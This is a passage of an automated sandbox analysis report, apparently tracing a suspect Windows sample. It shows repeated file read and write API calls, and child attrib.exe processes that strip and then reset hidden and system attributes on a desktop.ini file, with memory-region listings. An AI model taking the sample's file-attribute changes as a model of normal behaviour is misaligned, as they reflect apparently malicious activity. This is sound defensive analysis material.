lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.998] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.998] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.999] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.999] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] GetFileType (hFile=0x4c) returned 0x1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] GetFileType (hFile=0x4c) returned 0x1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] GetFileType (hFile=0x4c) returned 0x1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.053] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.053] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.054] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.054] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.055] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.055] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x32, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x32, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.055] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0211.055] _close (_FileHandle=4) returned 0 [0211.055] FindNextFileW (in: hFindFile=0x2b0e70, lpFindFileData=0x22f21c | out: lpFindFileData=0x22f21c) returned 0 [0211.056] GetLastError () returned 0x12 [0211.056] FindClose (in: hFindFile=0x2b0e70 | out: hFindFile=0x2b0e70) returned 1 [0211.056] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0211.056] _close (_FileHandle=3) returned 0 [0211.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.057] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0211.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.057] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0211.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.057] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0211.057] SetConsoleInputExeNameW () returned 0x1 [0211.057] GetConsoleOutputCP () returned 0x1b5 [0211.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.057] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.057] exit (_Code=0) Process: id = "515" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16940" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "512" os_parent_pid = "0x9ac" cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31082 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31083 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31084 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31085 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31086 start_va = 0xbc0000 end_va = 0xbc6fff entry_point = 0xbc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31087 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31088 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31089 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31090 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 31091 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31092 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31093 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31094 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31095 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 31096 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 31097 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31098 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31099 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31100 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31101 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31102 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31103 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31104 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31105 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31106 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31107 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31108 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31109 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31110 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31111 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 716 os_tid = 0x898 Process: id = "516" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16940" os_pid = "0x9d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "512" os_parent_pid = "0x9ac" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31112 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31113 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31114 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31115 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 31116 start_va = 0xb90000 end_va = 0xb96fff entry_point = 0xb90000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31117 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31118 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31119 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31120 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 31121 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31122 start_va = 0x10000 end_va = 0x1ffff entry_point = 